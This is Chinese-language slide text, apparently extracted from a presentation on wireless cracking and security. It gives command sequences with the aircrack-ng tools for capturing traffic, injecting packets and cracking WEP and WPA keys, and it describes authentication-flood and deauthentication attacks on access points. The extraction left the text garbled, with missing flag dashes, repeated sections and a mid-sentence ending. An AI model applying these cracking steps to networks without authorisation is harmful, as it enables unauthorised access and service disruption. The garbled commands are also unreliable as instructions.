无线破解和安全

1、无线破解和安全提纲nWEP的破解（1）nWPA的破解n无线安全相关背景n无线网卡的选择l芯片。Athetos ，Prism，Ralink （USB）l无线网卡的硬件/固件版本l无线网卡的功率及规格n基本知识lSSID（Service Set Identifier,服务集标识符） 一个唯一的标识符，最大长度32lWAP（wireless Application Protocol，无线应用协议）lAP(wireless Access Point) 无线接入点相关背景n几个比较好的无线破解系统（Linux）lBackTracklWiFiSlaxlWiFiWaynLinux系统下无线探测工具lKism

2、et（Bt4自带）lWicrawl（扩展功能较好）lAirSnort（具有自动抓包并破解WEP的能力）lBt4下使用iwlist或者相关背景n几个比较出名linux系统lBackTracklWiFiSlaxlWiFiWaynLinux系统下无线探测工具lKismet（Bt4自带）lWicrawl（扩展功能较好）lAirSnort（具有自动抓包并破解WEP的能力）lBt4下使用iwlist或者Internet-Wicd Network Manager相关背景n几个比较出名linux系统lBackTracklWiFiSlaxlWiFiWaynLinux系统下无线探测工具lKismet（Bt4自带）

3、lWicrawl（扩展功能较好）lAirSnort（具有自动抓包并破解WEP的能力）lBt4下使用iwlist或者Internet-Wicd Network ManagerWEP破解技术（1）nIfconfig a wlan0 upl载入无线网卡的驱动程序l首先要在vmware中连接n探测无线AP的信息nairmon-ng start wlan0 监控频道l成功后会开启一个监控网卡，如 mon0nairodumpng w dump channel 6 mon0naireplay-ng -3 b aps MAC h clients MAC x 1024 mon0 naircrack-ng x f

4、 2 dump-01.capWEP破解技术（2）nIfconfig a wlan0 upl载入无线网卡的驱动程序l首先要在vmware中连接n探测无线AP的信息nairmon-ng start wlan0 监控频道l成功后会开启一个监控网卡，如 mon0nairodump ng ivs c 监控频道w dump channel 6 mon0naireplay-ng -1 0 e aps essid aps MAC h clients MAC (网卡) x mon0 WEP破解技术（2）naireplay-ng -4 b APs MAC h clients MAC mon0lChopchop 攻

5、击l生产可用的密钥数据流文件l会生产一个cap和一个xor的文件npacketforge-ng o a APMAC h clients MAC -k 255.255.255.255 -1 255.255.255.255 y fragment xor file w dump1nairepaly-ng -2 r dump1 mon0naircrack-ng dump*.ivsWAP破解技术n airmon-ng start wlan0l没有正常的加载驱动n airodump-ng -w dump channel 频道 mon0lDump为数据包n aireplay-ng -o 攻击次数 APs M

6、AC h clients MAC mon0lWPA握手的验证n zcat /pentest/password/dictionaries/ wordlist.txt.Z password.txtl生产字典（bt4 自带）n aircrack-ng w password.txt -z dump01.capl破解WEP破解流程无线的安全身份验证洪泛攻击n攻击原理l关联的客户端向AP发送大量伪造身份验证请求l当请求超出AP的承载能力时断开与客户的连接n攻击实现l使用看似合法的但是随机生成MAC伪造工作站l向AP发送大量的虚假请求身份验证失败攻击n攻击原理l关联的客户端向AP伪造客户端无效验证帧lAP将受害客户端更新为状态1n攻击实现l关联客户端伪造某合法客户端向AP发送无效的验